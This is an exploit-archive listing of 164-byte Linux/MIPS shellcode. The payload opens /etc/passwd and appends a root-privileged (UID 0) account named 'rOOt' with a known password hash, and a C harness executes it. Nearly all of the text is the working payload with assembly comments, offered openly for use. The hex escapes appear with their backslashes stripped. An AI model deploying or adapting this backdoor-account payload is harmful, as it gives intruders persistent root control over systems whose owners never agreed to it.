[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/MIPS - add user(UID 0) with password - 164 bytes
# Published : 2011-11-27
# Author :
# Previous Title : SuperH (sh4) Add root user with password
# Next Title : Linux/MIPS - execve /bin/sh - 48 bytes
/* Title: Linux/MIPS -add user(UID 0) with password - 164 bytes
* Date: 2011-11-24
* Author: rigan - imrigan [at] gmail.com
* Note:
* Username - rOOt
* Password - pwn3d
*/
#include <stdio.h>
char sc[] =
"x24x09x73x50" // li t1,29520
"x05x30xffxff" // bltzal t1,400094 <L>
"x24x09x73x50" // li t1,29520 (nop)
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */
"x3cx0fx30x2f" // lui t7,0x302f
"x35xefx65x74" // ori t7,t7,0x6574
"x3cx0ex63x2f" // lui t6,0x632f
"x35xcex70x61" // ori t6,t6,0x7061
"x3cx0dx73x73" // lui t5,0x7373
"x35xadx77x64" // ori t5,t5,0x7764
"xafxafxffxf3" // sw t7,-13(sp)
"xafxaexffxf7" // sw t6,-9(sp)
"xafxadxffxfb" // sw t5,-5(sp)
"xafxa0xffxff" // sw zero,-1(sp)
"x27xa4xffxf4" // addiu a0,sp,-12
"x24x05x01x6d" // li a1,365
"x24x02x0fxa5" // li v0,4005
"x01x01x01x0c" // syscall 0x40404
"xafxa2xffxfc" // sw v0,-4(sp)
/* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn", 45); */
"x8fxa4xffxfc" // lw a0,-4(sp)
"x23xe5x10x0c" // addi a1,ra,4108
"x20xa5xf0x60" // addi a1,a1,-4000
"x24x09xffxd3" // li t1,-45
"x01x20x30x27" // nor a2,t1,zero
"x24x02x0fxa4" // li v0,4004
"x01x01x01x0c" // syscall 0x40404
/* close(fd); */
"x24x02x0fxa6" // li v0,4006
"x01x01x01x0c" // syscall 0x40404
/* exit(0); */
"x28x04xffxff" // slti a0,zero,-1
"x24x02x0fxa1" // li v0,4001
"x01x01x01x0c" // syscall 0x40404
/* "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bashn" */
"x72x4fx4fx74"
"x3ax58x4ax31"
"x47x56x2ex6e"
"x79x46x46x4d"
"x6fx49x3ax30"
"x3ax30x3ax72"
"x6fx6fx74x3a"
"x2fx72x6fx6f"
"x74x3ax2fx62"
"x69x6ex2fx62"
"x61x73x68x0a";
void main(void)
{
void(*s)(void);
printf("size: %dn", strlen(sc));
s = sc;
s();
}